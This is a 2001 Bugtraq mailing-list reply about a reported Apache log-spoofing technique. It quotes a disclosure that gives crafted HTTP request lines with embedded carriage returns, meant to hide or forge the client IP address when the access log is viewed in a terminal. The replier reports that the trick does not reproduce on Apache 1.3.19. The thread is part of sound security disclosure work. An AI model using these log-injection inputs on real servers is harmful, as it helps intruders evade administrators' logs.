[22992] in bugtraq
Re: Hidden requests to Apache
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Rasmus_B=F8g_Hansen)
Thu Oct 25 10:58:12 2001
Date: Thu, 25 Oct 2001 08:00:51 +0200 (CEST)
From: =?iso-8859-1?Q?Rasmus_B=F8g_Hansen?= <moffe@amagerkollegiet.dk>
To: smiler <smiler@vxd.org>
Cc: <bugtraq@securityfocus.com>, <submissions@packetstormsecurity.org>
In-Reply-To: <LEEPKOFKPCPHJMIIKFGJEENLCBAA.smiler@vxd.org>
Message-ID: <Pine.LNX.4.33.0110250755040.1491-100000@grignard.amagerkollegiet.dk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-1
Content-Transfer-Encoding: 8BIT
On Wed, 24 Oct 2001, smiler wrote:
> It´s possible to "cheat" a Apache SysAdministrator and make him think that
> his server didn´t log a HTTP request or make him think that a request has
> been made by another Ip address.
> This "cheating" is only valid when the log is displayed on the screen using
> common unix utils as cat, tail, grep, etc...
> This will not work with the kind of sysadmin that edit the logs using vi or
> even print them to read at night on bed eh eh :-)
> I am not sure if this can be considered as a bug or as a feature (?) but in
> any case it will surely lead apache sysadmins into mistake !!
I cannot reproduce this on RedHat Linux 7.0, apache 1.3.19.
> ----------Technique----------
>
> To make a request and to make it seem like it came from NO IP ADDRESS at
> all, the request should be made as this :
>
> GET / HTTP/1.0 \r\r\n
>
> In this case APACHE will print in the log file the carriage return
> character. So when we try to tail the access_log file it will be shown in
> the screen as :
>
> " 414 3461.251 - - [24/Oct/2001:18:58:18 +0100] "GET / HTTP/1.0
GET / HTTP/1.0 \r\r\n
gives this log entry:
194.182.238.30 - - [25/Oct/2001:07:54:01 +0200] "GET / HTTP/1.0 \r\r\n"
200 510 "-" "-"
> A normal line would be :
>
> 127.0.0.1 - - [24/Oct/2001:19:00:32 +0100] "GET / HTTP/1.0" 200 164
>
> The normal line output will help us to understand that what happens is cat
> made a carriage return after the HTTP/1.0 and printed the rest of the log
> over the Ip Address field.
> We can also make it look like the request came from another Ip address, and
> this is preferable because like this the SysAdmin will see no apparent
> strange behaviour in the logfile. Just be carefull with the timestamp !!
> So the request should be :
>
> GET / HTTP/1.0 \r10.0.0.1 - - [24/Oct/2001:19:00:32 +0100] "GET /
> HTTP/1.0\r\n
>
> And the logfile will appear like this :
>
> 10.0.0.1 - - [24/Oct/2001:19:00:32 +0100] "GET / HTTP/1.0" 200 164
The above gives this log entry:
194.182.238.3 - - [25/Oct/2001:07:56:41 +0200] "GET / HTTP/1.0
\r10.0.0.1 - - [24/Oct/2001:19:00:32 +0100] "GET / HTTP/1.0\r\n" 200 510
"-" "-"
Rasmus
--
-- [ Rasmus 'Møffe' Bøg Hansen ] ---------------------------------------
I haven't lost my mind;
I have backed it up on tape somewhere........
--------------------------------- [ moffe at amagerkollegiet dot dk ] --
